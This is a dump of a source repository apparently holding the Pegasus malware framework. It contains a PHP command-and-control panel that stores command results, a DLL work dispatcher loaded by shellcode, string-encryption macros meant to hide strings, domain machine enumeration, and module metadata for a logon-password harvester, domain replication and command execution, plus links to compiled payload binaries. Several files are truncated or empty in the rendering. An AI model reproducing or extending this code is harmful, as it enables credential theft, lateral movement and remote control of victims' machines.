{884d1b19-d44f-43be-a1e2-10637acc7096} 17 | 18 | 19 | {e28722b0-6050-4e42-bc1d-4cda2352a585} 20 | 21 | 22 | {454cfc1d-f375-4743-b318-2f8a82a1f686} 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files\libs 31 | 32 | 33 | Source Files\libs 34 | 35 | 36 | Source Files\libs 37 | 38 | 39 | Source Files\libs 40 | 41 | 42 | Source Files\libs 43 | 44 | 45 | Source Files\libs 46 | 47 | 48 | Source Files\incs 49 | 50 | 51 | Source Files\incs 52 | 53 | 54 | Source Files\libs 55 | 56 | 57 | 58 | 59 | Header Files 60 | 61 | 62 | Header Files\libs 63 | 64 | 65 | Header Files\libs 66 | 67 | 68 | Header Files\libs 69 | 70 | 71 | Header Files\libs 72 | 73 | 74 | Header Files\libs 75 | 76 | 77 | Header Files 78 | 79 | 80 | Header Files\libs 
81 | 82 | 83 | Header Files\incs 84 | 85 | 86 | Header Files\libs 87 | 88 | 89 | Header Files\libs 90 | 91 | 92 | -------------------------------------------------------------------------------- /Pegasus/RemoteServiceExe/rse.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /Pegasus/Shellcode/Shellcode.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {720fbc28-553d-47a8-9b47-e14475397dd8} 14 | 15 | 16 | {1c471d13-0137-494f-9cd9-4497cc87d11e} 17 | 18 | 19 | 20 | 21 | Source Files\libs 22 | 23 | 24 | Source Files\libs 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | Header Files\libs 33 | 34 | 35 | Header Files\libs 36 | 37 | 38 | Header Files 39 | 40 | 41 | -------------------------------------------------------------------------------- /Pegasus/Shellcode/Shellcode.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Pegasus/WEB/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine on 2 | RewriteOptions inherit 3 | RewriteRule ^(.*)$ index.php [L] -------------------------------------------------------------------------------- /Pegasus/WEB/Properties/PublishProfiles/denwer.phppub: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | True 5 | True 6 | \\denwer\pegasus 7 | FileSystem 8 | 9 | -------------------------------------------------------------------------------- /Pegasus/WEB/Properties/PublishProfiles/denwer.phppub.user: 
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 04/16/2015 05:51:36 6 | 7 | 8 | 03/27/2012 20:14:14 9 | 10 | 11 | 05/19/2015 07:21:13 12 | 13 | 14 | 03/27/2012 20:14:14 15 | 16 | 17 | 05/19/2015 11:48:18 18 | 19 | 20 | 04/23/2015 18:47:46 21 | 22 | 23 | 04/22/2015 06:57:00 24 | 25 | 26 | 04/22/2015 05:35:01 27 | 28 | 29 | 08/04/2015 10:59:31 30 | 31 | 32 | 07/19/2015 10:35:32 33 | 34 | 35 | 06/07/2015 19:53:25 36 | 37 | 38 | 07/18/2015 20:16:09 39 | 40 | 41 | 05/29/2015 18:58:41 42 | 43 | 44 | 07/18/2015 20:16:09 45 | 46 | 47 | 08/10/2015 21:24:12 48 | 49 | 50 | 08/05/2015 11:21:32 51 | 52 | 53 | 05/29/2015 18:26:58 54 | 55 | 56 | -------------------------------------------------------------------------------- /Pegasus/WEB/cfg/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Order allow,deny 3 | Deny from all 4 | -------------------------------------------------------------------------------- /Pegasus/WEB/cfg/config.php: -------------------------------------------------------------------------------- 1 | 'localhost', 8 | 'db' => 'pegasus', 9 | 'user' => 'root', 10 | 'password' => '12345' 11 | ); 12 | 13 | // TARGET_BUILDCHAIN_HASH 14 | $g_k = '7393c9a643eb4a76'; 15 | 16 | 17 | 18 | 19 | ?> -------------------------------------------------------------------------------- /Pegasus/WEB/inc/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Order allow,deny 3 | Deny from all 4 | -------------------------------------------------------------------------------- /Pegasus/WEB/inc/mod_crypt.php: -------------------------------------------------------------------------------- 1 | unsigned 18 | $k['m_w'] = (float)sprintf('%u', $k['m_w']); 19 | $k['m_z'] = (float)sprintf('%u', $k['m_z']); 20 | 21 | //echo "k={$g_k} w=".bin2hex(pack('V', $k['m_w']))." ({$k['m_w']}) z=".bin2hex(pack('V', $k['m_z']))." 
({$k['m_z']})\n";
22 |
23 | while ($len) {
24 |
25 | //echo "i={$len} a=".strval(($k['m_w'] & 65535))." b=".strval(36969 * ($k['m_w'] & 65535))." c=".strval((($k['m_w'] >> 16) & $mask))." ";
26 |
   // One step of the two-word multiply-with-carry style generator: each state word
   // becomes (its low 16 bits * constant) + its high 16 bits. $mask, $len, $pwd and the
   // seeding of $k from $g_k happen above this excerpt (the commented echo mentions $g_k).
27 | $k['m_z'] = 36969 * ($k['m_z'] & 65535) + (($k['m_z'] >> 16) & $mask);
28 | $k['m_w'] = 18000 * ($k['m_w'] & 65535) + (($k['m_w'] >> 16) & $mask);
29 |
   // only the low byte of the combined state is kept per iteration
30 | $val = (($k['m_z'] << 16) + $k['m_w']) & 0xFF;
31 |
32 | $pwd .= chr($val);
33 | //echo "i={$len} v={$val} w=".bin2hex(pack('V', $k['m_w']))." ({$k['m_w']}) z=".bin2hex(pack('V', $k['m_z']))." ({$k['m_z']})\n";
34 |
35 | $len--;
36 | }
37 |
38 |
   // key material = raw (binary, 20-byte) SHA-1 of the generated byte string
39 | return sha1($pwd, TRUE);
40 | }
41 |
42 |
43 |
/*
 * Decrypts $data with single DES. Key = cryptGenPwd(), a deterministic value derived
 * from the build hash $g_k; options = 1 (OPENSSL_RAW_DATA), so $data is raw bytes, not
 * base64. No IV argument is given; the @ hides whatever openssl_decrypt() warns about —
 * most likely the empty-IV warning, in which case an all-zero IV is used (confirm).
 * Returns the plaintext, or FALSE on failure (openssl_decrypt()'s own contract).
 * NOTE(review): 56-bit DES with a static per-build key and no IV — anyone holding $g_k
 * and this derivation can decrypt every message. How the 20-byte SHA-1 digest is fitted
 * to DES's 8-byte key is left to openssl_decrypt() (presumably truncated) — confirm.
 */
44 | function cryptDecrypt($data)
45 | {
46 | return @openssl_decrypt($data, 'des', cryptGenPwd(), 1);
47 | }
48 |
49 |
50 |
/*
 * Inverse of cryptDecrypt(): DES-encrypts $data with the same derived key and the same
 * options (raw output, no IV). Returns the ciphertext, or FALSE on failure.
 */
51 | function cryptEncrypt($data)
52 | {
53 | return @openssl_encrypt($data, 'des', cryptGenPwd(), 1);
54 | }
55 |
56 | ?>
-------------------------------------------------------------------------------- /Pegasus/WEB/inc/mod_db.php: --------------------------------------------------------------------------------
1 |
-------------------------------------------------------------------------------- /Pegasus/WEB/inc/mod_log.php: --------------------------------------------------------------------------------
/* NOTE: lines 1-15 of this file (the opening PHP tag through the `foreach ($_SERVER as $name =>`
   header, presumably a getallheaders() polyfill) were swallowed by the page renderer; only the
   fragment below survives. */
1 | $value)
16 | {
17 | if (substr($name, 0, 5) == 'HTTP_')
18 | {
   // HTTP_X_SOME_HEADER -> X-Some-Header
19 | $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
20 | }
21 | }
22 | return $headers;
23 | }
24 | }
25 |
26 | /*
27 | Saves unparsed query information to db
   Inserts one row into q_log: a JSON object holding the parse error text, request method,
   URI, remote address and every request header (getallheaders()). The JSON string is run
   through mysqli_real_escape_string() before interpolation. Uses the global $g_dblink
   connection; the result of mysqli_query() is not checked, so a failed insert is silent.
28 | */
29 | function logSaveQuery($parse_error)
30 | {
31 | global $g_dblink;
32 |
33 | $log = array_merge(
34 | array(
35 | 'ERR' => $parse_error,
36 | 'Method' => $_SERVER['REQUEST_METHOD'],
37 | 'Uri' => $_SERVER['REQUEST_URI'],
38 | 'Remote-Address' => $_SERVER['REMOTE_ADDR']
39 | ),
40 | getallheaders()
41 | );
42 |
43 | $enc_log = mysqli_real_escape_string($g_dblink, json_encode($log));
44 |
45 | mysqli_query($g_dblink, "INSERT INTO `q_log` (`stamp`, `log_json`) VALUES (NOW(), '{$enc_log}')");
46 |
47 | }
48 |
49 | ?>
-------------------------------------------------------------------------------- /Pegasus/WEB/inc/mod_output.php: --------------------------------------------------------------------------------
1 |
-------------------------------------------------------------------------------- /Pegasus/WEB/inc/parser_0002.php: --------------------------------------------------------------------------------
1 |
-------------------------------------------------------------------------------- /Pegasus/WEB/inc/parser_0003.php: --------------------------------------------------------------------------------
/* NOTE: the opening of this file (PHP tag, the handler's signature and the code that fills
   $item, $mod_data and $payload — everything up to the middle of line 25) was swallowed by the
   page renderer. The surviving tail stores a command result into cmds_list; $error and FALSE
   signal failure to the caller, TRUE success. */
1 | strlen($mod_data)) { $error = __FUNCTION__."(".__LINE__."): basic len check failed, found {$item['dwPayloadSize']}, max expected ".strval(strlen($mod_data)); return FALSE; }
26 | if (strlen($payload) != $item['dwPayloadSize']) { $error = __FUNCTION__."(".__LINE__."): payload len mismatch, expected {$item['dwPayloadSize']}, found ".strval(strlen($payload)); return FALSE; }
27 |
   // the payload body is escaped before being interpolated into the query
28 | $payload = mysqli_real_escape_string($g_dblink, $payload);
29 |
   // NOTE(review): `is_done` and `id` are interpolated from $item with neither escaping nor an
   // (int) cast. That is only safe if the upstream parser produces wGenericResult / dwUniqCmdId
   // as integers (e.g. via unpack()) — confirm; otherwise this is an SQL injection point reachable
   // from a client-supplied message.
30 | if (!mysqli_query($g_dblink, "UPDATE `cmds_list` SET `is_done`={$item['wGenericResult']}, `answer`='{$payload}' WHERE `id`={$item['dwUniqCmdId']} LIMIT 1;")) { $error = __FUNCTION__."(".__LINE__."): query failed: ".mysqli_error($g_dblink); return FALSE; }
31 |
32 | // all ok if got here
33 | return TRUE;
34 | }
35 |
36 | ?>
-------------------------------------------------------------------------------- /Pegasus/WEB/inc/parser_0004.php: --------------------------------------------------------------------------------
1 |
-------------------------------------------------------------------------------- /Pegasus/WEB/inc/parser_0005.php: --------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Pegasus/WEB/inc/parser_0007.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/WEB/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/WEB/pegasus-web.phpproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | Debug 5 | pegasus-web 6 | f4cba7e9-6d7b-4d03-bb44-5d201148dd94 7 | Library 8 | PHPWebProject1 9 | {A0786B88-2ADB-4C21-ABE8-AA2D79766269} 10 | PHPWebProject1 11 | 12 | False 13 | Custom 14 | BeforeRun 15 | True 16 | 46112 17 | denwer 18 | http://localhost:46112/ 19 | http://denwer/pegasus/ 20 | denwer 21 | 22 | 23 | true 24 | 25 | 26 | false 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /Pegasus/WEB/pegasus-web.phpproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | denwer 5 | DontOpenPage 6 | 7 | 8 | True 9 | False 10 | False 11 | 12 | -------------------------------------------------------------------------------- /Pegasus/WorkDispatcherDll/wdd.c: -------------------------------------------------------------------------------- 1 | /* 2 | wdd.c 3 | Work Dispatcher DLL 4 | Executed by some binary or shellcode on second run stage. 
Establishes core module functionality, 5 | loads all other modules specified at DllEntry param 6 | 7 | */ 8 | 9 | 10 | // perform essential compiler settings 11 | // remove stdlib 12 | #pragma comment(linker, "/NODEFAULTLIB:libcmt.lib") 13 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRT.lib") 14 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRTD.lib") 15 | #pragma comment(linker, "/NODEFAULTLIB:libcmtd.lib") 16 | 17 | #if defined(_M_X64) 18 | // x64 system libs 19 | #pragma comment (lib, "..\\lib\\amd64\\BufferOverflowU.lib") 20 | #pragma comment (lib, "..\\lib\\amd64\\ntdll.lib") 21 | #define TARGET_ARCH ARCH_TYPE_X64 22 | #elif defined(_M_IX86) 23 | // x32 system libs 24 | #pragma comment (lib, "..\\lib\\i386\\BufferOverflowU.lib") 25 | #pragma comment (lib, "..\\lib\\i386\\ntdll.lib") 26 | #define TARGET_ARCH ARCH_TYPE_X32 27 | #else 28 | #error Unknown target CPU, no system libs can be found 29 | #endif 30 | 31 | #include 32 | 33 | #include "..\inc\mem.h" 34 | #include "..\inc\dbg.h" 35 | //#include "..\inc\CryptoStrings.h" 36 | 37 | #include "..\inc\WorkDispatcher.h" 38 | 39 | #include "..\shared\config.h" 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | #include "wdd.h" 49 | 50 | 51 | 52 | // entrypoint function for service exe 53 | BOOL WINAPI DllEntry(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 54 | { 55 | BOOL bRes = TRUE; 56 | 57 | if (fdwReason == DLL_PROCESS_ATTACH) { 58 | 59 | DbgPrint("DLL_PROCESS_ATTACH: entered"); 60 | 61 | // do init and return right back 62 | WorkDispatcherInit((SHELLCODE_CONTEXT *)lpvReserved); 63 | 64 | //#ifdef _DEBUG 65 | // memPrintAllocationListDialog(0x1); 66 | //#endif 67 | 68 | DbgPrint("DLL_PROCESS_ATTACH: done"); 69 | 70 | } // DLL_PROCESS_ATTACH 71 | 72 | return bRes; 73 | } 74 | 75 | 76 | 77 | 78 | 79 | #ifdef _DEBUG 80 | 81 | // entrypoint to be caller from regsvr32 for debugging 82 | 83 | __declspec(dllexport) HRESULT __stdcall DllRegisterServer(void) 84 | { 85 | DbgPrint("entered dbg mode"); 86 | 87 | // 
DllEntry(NULL, DLL_PROCESS_ATTACH, NULL); 88 | 89 | DbgPrint("finished"); 90 | 91 | Sleep(INFINITE); 92 | 93 | return S_OK; 94 | } 95 | 96 | #endif 97 | -------------------------------------------------------------------------------- /Pegasus/WorkDispatcherDll/wdd.h: -------------------------------------------------------------------------------- 1 | /* 2 | wdd.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/WorkDispatcherDll/wdd.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | regsvr32.exe 5 | $(TargetPath) 6 | WindowsLocalDebugger 7 | 8 | 9 | regsvr32.exe 10 | $(TargetPath) 11 | WindowsLocalDebugger 12 | 13 | -------------------------------------------------------------------------------- /Pegasus/binres/idd.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/idd.x32 -------------------------------------------------------------------------------- /Pegasus/binres/idd.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/idd.x64 -------------------------------------------------------------------------------- /Pegasus/binres/info.json/idd: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_IDD", 3 | "emcModuleClassname" : 0, 4 | "civClassnameIdValue" : 0, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/mod_CmdExec: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : 
"RES_TYPE_MODULE", 3 | "emcModuleClassname" : "MODULE_CLASS_TASKWORKS", 4 | "civClassnameIdValue" : 1, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/mod_DomainReplication: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_MODULE", 3 | "emcModuleClassname" : "MODULE_CLASS_REPLICATOR", 4 | "civClassnameIdValue" : 1, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/mod_KBRI: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_MODULE", 3 | "emcModuleClassname" : "MODULE_CLASS_OTHER", 4 | "civClassnameIdValue" : 1, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/mod_KBRI_hd: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_KBRI_HD", 3 | "emcModuleClassname" : 0, 4 | "civClassnameIdValue" : 0, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/mod_LogonPasswords: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_MODULE", 3 | "emcModuleClassname" : "MODULE_CLASS_AUTHCREDS_HARVESTER", 4 | "civClassnameIdValue" : 1, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/mod_NetworkConnectivity: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_MODULE", 3 | "emcModuleClassname" : "MODULE_CLASS_NETWORK", 4 | "civClassnameIdValue" : 1, 5 | "ModuleVersion" : 1 6 | } 
-------------------------------------------------------------------------------- /Pegasus/binres/info.json/rse: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_RSE", 3 | "emcModuleClassname" : 0, 4 | "civClassnameIdValue" : 0, 5 | "ModuleVersion" : 1, 6 | "DoSign" : 1, 7 | "AVCheckSave": 1 8 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/shellcode: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_SHELLCODE", 3 | "emcModuleClassname" : 0, 4 | "civClassnameIdValue" : 0, 5 | "ModuleVersion" : "%shellcode_ep_offset%" 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/info.json/wdd: -------------------------------------------------------------------------------- 1 | { 2 | "rtResourceType" : "RES_TYPE_WDD", 3 | "emcModuleClassname" : 0, 4 | "civClassnameIdValue" : 0, 5 | "ModuleVersion" : 1 6 | } -------------------------------------------------------------------------------- /Pegasus/binres/mod_CmdExec.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_CmdExec.x32 -------------------------------------------------------------------------------- /Pegasus/binres/mod_CmdExec.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_CmdExec.x64 -------------------------------------------------------------------------------- /Pegasus/binres/mod_DomainReplication.x32: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_DomainReplication.x32 -------------------------------------------------------------------------------- /Pegasus/binres/mod_DomainReplication.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_DomainReplication.x64 -------------------------------------------------------------------------------- /Pegasus/binres/mod_LogonPasswords.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_LogonPasswords.x32 -------------------------------------------------------------------------------- /Pegasus/binres/mod_LogonPasswords.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_LogonPasswords.x64 -------------------------------------------------------------------------------- /Pegasus/binres/mod_NetworkConnectivity.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_NetworkConnectivity.x32 -------------------------------------------------------------------------------- /Pegasus/binres/mod_NetworkConnectivity.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/mod_NetworkConnectivity.x64 -------------------------------------------------------------------------------- /Pegasus/binres/readme.txt: 
-------------------------------------------------------------------------------- 1 | This directory contains files to be incorporated into resulting binres pack. 2 | Post-build script for installer routine searches for *.x32/*.x64 pairs here 3 | For every found file, it searches for a corresponding .info.json file with params about a specified module 4 | to be put into resulting structure. 5 | Output is put into binpack.bin here and translated into ..\inc\binpack.h -------------------------------------------------------------------------------- /Pegasus/binres/rse.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/rse.x32 -------------------------------------------------------------------------------- /Pegasus/binres/rse.x32.nosign.sav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/rse.x32.nosign.sav -------------------------------------------------------------------------------- /Pegasus/binres/rse.x32.sign.sav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/rse.x32.sign.sav -------------------------------------------------------------------------------- /Pegasus/binres/rse.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/rse.x64 -------------------------------------------------------------------------------- /Pegasus/binres/rse.x64.nosign.sav: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/rse.x64.nosign.sav -------------------------------------------------------------------------------- /Pegasus/binres/rse.x64.sign.sav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/rse.x64.sign.sav -------------------------------------------------------------------------------- /Pegasus/binres/shellcode.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/shellcode.x32 -------------------------------------------------------------------------------- /Pegasus/binres/shellcode.x64.tlog: -------------------------------------------------------------------------------- 1 | Z:\Sources\Pegasus\binres\shellcode.x64(C4FA4EB4h:4552/4244)[mod_DomainReplication x64]: DllEntry@92: DLL_PROCESS_ATTACH: entered 2 | Z:\Sources\Pegasus\binres\shellcode.x64(C4FA4EB4h:4552/4244)[mod_DomainReplication x64]: DllEntry@100: DLL_PROCESS_ATTACH: done 3 | Z:\Sources\Pegasus\binres\shellcode.x64(C4FA4EB4h:4552/4936)[mod_DomainReplication x64]: thrModuleRun@72: entered 4 | Z:\Sources\Pegasus\binres\shellcode.x64(C4FA4EB4h:4552/4936)[mod_DomainReplication x64]: infStartDomainReplication@740: entered 5 | Z:\Sources\Pegasus\binres\shellcode.x64(C4FA4EC4h:4552/4936)[mod_DomainReplication x64]: infStartDomainReplication@745: v2 now 6 | -------------------------------------------------------------------------------- /Pegasus/binres/wdd.x32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/wdd.x32 
-------------------------------------------------------------------------------- /Pegasus/binres/wdd.x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/binres/wdd.x64 -------------------------------------------------------------------------------- /Pegasus/inc/CryptRoutines.h: -------------------------------------------------------------------------------- 1 | /* 2 | CryptRoutines.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | #include "MyStreams.h" 9 | 10 | // internal global structure holding crypt keys 11 | typedef struct _CRYPT_CONTEXT { 12 | 13 | BOOL bInited; // flag indicating if init was performed 14 | 15 | HCRYPTPROV hProvider; // crypto api provider used in routines 16 | HCRYPTKEY hKey; // key handle used in encryption/decryption routines 17 | 18 | } CRYPT_CONTEXT, *PCRYPT_CONTEXT; 19 | 20 | BOOL cryptCalcHashSHA(PVOID pData, SIZE_T ulSize, PBYTE pbResultBuffer, PULONG pulBufferLen); 21 | BOOL cryptEncryptStream(MY_STREAM *mStream); 22 | BOOL cryptDecryptBuffer(LPVOID pCrypted, DWORD dwCryptedLen, LPVOID *pDecrypted, DWORD *dwDecryptedLen); -------------------------------------------------------------------------------- /Pegasus/inc/CryptoStrings.h: -------------------------------------------------------------------------------- 1 | /* 2 | CryptoStrings.h 3 | Headers for cryptostrings 4 | 5 | Main idea is CRSTR(original_string, crypted_varname) macro like 6 | 7 | szBuff = CRSTR("/script.html", "\xff\xff\x0f\x0c\xf3\xff\x40\x17\xec\xf5\xe6\xf4\x1b\x49\xc7\xd0\x22\x2b\x3b"); 8 | 9 | In case of no CRSTR_ENABLE defined, it will expand to an ANSI string in a manner 10 | szBuff = "/script.html"; 11 | 12 | In case of crypto strings enabled, it will be expanded to string decryption routine's call like 13 | szBuff = __CRSTRDecrypt("\x02\x05\x33\x10\x90\x90\x90\x90\x66\x66\x66\x66\x66\x66"); 14 | passed crypted binary string 
is generated by parser. 15 | 16 | It is possible to define a string encryption solely inside of C++11 compilation using variadic templates. 17 | But they are too ugly. 18 | 19 | */ 20 | #pragma once 21 | 22 | #include 23 | 24 | // dbg to totally remove string encryption 25 | //#define CRSTR_DISABLE 26 | 27 | 28 | 29 | 30 | 31 | 32 | // select how to implement crypt macro 33 | #ifdef CRSTR_DISABLE 34 | // no encryption 35 | #define CRSTR(original_str, crypted_str) original_str 36 | 37 | #else 38 | // use encryption 39 | #define CRSTR(original_str, crypted_str) __CRSTRDecrypt((BYTE *)crypted_str) 40 | #define CRSTRA(original_str, crypted_str) CRSTR(original_str, crypted_str) 41 | #define CRSTRW(original_str, crypted_str) __cs_AtoW(__CRSTRDecrypt((BYTE *)crypted_str)) 42 | 43 | // NB: n_minlen, n_maxlen is [1,255] range, 44 | // s_generation_regexp is regexp like "[a-zA-Z0-9._]" to be matched against chr(rand(0,255)) 45 | #define CRSTRW_RND(rnd_decrypted_str, rnd_encrypted_str, n_minlen, n_maxlen, s_generation_regexp) __cs_AtoW(__CRSTRDecrypt((BYTE *)rnd_encrypted_str)) 46 | 47 | // define functions for import-export, used in both compilation modes 48 | typedef struct _CryptoStrings_ptrs { 49 | 50 | LPSTR (*fn__CRSTRDecrypt)(const BYTE *pIn); // decryption routine 51 | LPWSTR(*fn__cs_AtoW)(LPSTR szAnsiString); // ansi to unicode convertor 52 | 53 | } CryptoStrings_ptrs, *PCryptoStrings_ptrs; 54 | 55 | 56 | #ifdef ROUTINES_BY_PTR 57 | 58 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 59 | 60 | // global var definition to be visible by all modules which use this one 61 | #ifdef __cplusplus 62 | extern "C" CryptoStrings_ptrs CryptoStrings_apis; 63 | #else 64 | extern CryptoStrings_ptrs CryptoStrings_apis; 65 | #endif 66 | 67 | // transparent code replacements 68 | #define __CRSTRDecrypt CryptoStrings_apis.fn__CRSTRDecrypt 69 | #define __cs_AtoW CryptoStrings_apis.fn__cs_AtoW 70 | 71 | 72 | VOID CryptoStrings_resolve(CryptoStrings_ptrs *apis); 73 | 74 | 
#else 75 | 76 | 77 | #ifdef __cplusplus 78 | extern "C" { 79 | #endif 80 | LPSTR __CRSTRDecrypt(const BYTE *pIn); // decryption routine 81 | LPWSTR __cs_AtoW(LPSTR szAnsiString); // ansi to unicode convertor 82 | 83 | VOID CryptoStrings_imports(CryptoStrings_ptrs *apis); 84 | #ifdef __cplusplus 85 | } 86 | #endif 87 | 88 | #endif 89 | 90 | #endif 91 | 92 | -------------------------------------------------------------------------------- /Pegasus/inc/DomainListMachines.h: -------------------------------------------------------------------------------- 1 | /* 2 | DomainListMachines.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | #include 8 | 9 | // callback function for enuming network items 10 | typedef BOOL(CALLBACK* WNETENUMITEMSFUNC)(LPNETRESOURCE, LPWSTR, LPVOID); 11 | 12 | // define functions for import-export, used in both compilation modes 13 | typedef struct _DomainListMachines_ptrs { 14 | 15 | BOOL (*fndlmEnumV1)(LPWSTR wszDomain); 16 | BOOL (*fndlmEnumV2)(BOOL bEnumShares, BOOL bEnumAllNetworks, WNETENUMITEMSFUNC efnEnumFunc, LPVOID pCallbackParam); 17 | 18 | } DomainListMachines_ptrs, *PDomainListMachines_ptrs; 19 | 20 | 21 | 22 | 23 | #ifdef ROUTINES_BY_PTR 24 | 25 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 26 | 27 | // global var definition to be visible by all modules which use this one 28 | extern DomainListMachines_ptrs DomainListMachines_apis; 29 | 30 | // transparent code replacements 31 | #define dlmEnumV1 DomainListMachines_apis.fndlmEnumV1 32 | #define dlmEnumV2 DomainListMachines_apis.fndlmEnumV2 33 | 34 | VOID DomainListMachines_resolve(DomainListMachines_ptrs *apis); 35 | 36 | #else 37 | 38 | BOOL dlmEnumV1(LPWSTR wszDomain); 39 | BOOL dlmEnumV2(BOOL bEnumShares, BOOL bEnumAllNetworks, WNETENUMITEMSFUNC efnEnumFunc, LPVOID pCallbackParam); 40 